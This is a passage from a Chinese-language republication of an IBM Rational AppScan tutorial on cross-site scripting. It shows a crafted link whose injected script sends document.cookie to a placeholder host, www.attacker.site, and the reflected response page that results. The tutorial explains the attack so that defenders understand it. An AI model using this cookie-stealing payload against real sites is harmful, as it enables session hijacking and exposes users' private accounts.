WEB开发网
开发学院网络安全安全技术 IBM Rational AppScan:跨站点脚本攻击深入解析 阅读

IBM Rational AppScan:跨站点脚本攻击深入解析

 2008-08-28 13:19:18 来源:WEB开发网   
核心提示: 当然,真正的恶意攻击包含了将这些 cookies 发送给黑客的操作,IBM Rational AppScan:跨站点脚本攻击深入解析(3),对此,黑客可能建立 Web 站点(www.attacker.site)并使用脚本来接收 cookies,因为这很容易检测其成功,范围和可行性攻击只会在

当然,真正的恶意攻击包含了将这些 cookies 发送给黑客的操作。对此,黑客可能建立 Web 站点(www.attacker.site)并使用脚本来接收 cookies。替代弹出窗口,黑客会书写访问 www.attacker.site 的 URL 的代码,从而调用接收 cookie 的脚本,其参数设置为被窃取的 cookies。这样,黑客可以从 www.attacker.site 服务器上获得 cookies。

恶意的链接会是:

http://www.vulnerable.site/welcome.cgi?name=<script>window.open
("http://www.attacker.site/collect
 .cgi?cookie="%2Bdocument.cookie)</script>

响应页面看起来像这样:

 <HTML> <Title>Welcome!</Title> Hi
 <script>window.open("http://www.attacker.site/collect.cgi?cookie=
"+document.cookie)</script>
 <BR>
 Welcome to our system ... </HTML>

加载该页面的浏览器会立即执行内嵌的 JavaScript,并向 www.attacker.site 中的 collect.cgi 脚本发送请求,并附带着浏览器已经拥有的 www.vulnerable.site 的 cookies 的值。这样就泄漏了客户端所拥有的 www.vulnerable.site 的 cookies。这将允许黑客冒充受害者。客户的隐私就完全被破坏了。

注意:

引发 JavaScript 弹出窗口的出现通常足够说明该站点容易受到 XSS 攻击。如果可以调用 JavaScript Alert 方法,那么通常没理由 window.open 调用不成功。这就是为什么大部分 XSS 攻击的实例使用 Alert 方法,因为这很容易检测其成功。

范围和可行性

攻击只会在受害者用于访问站点(www.vulnerable.site)的同一个浏览器中发生。黑客需要强迫客户端访问恶意链接。这会以以下这些方式进行:

上一页  1 2 3 4 5 6 7  下一页

Tags:IBM Rational AppScan

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接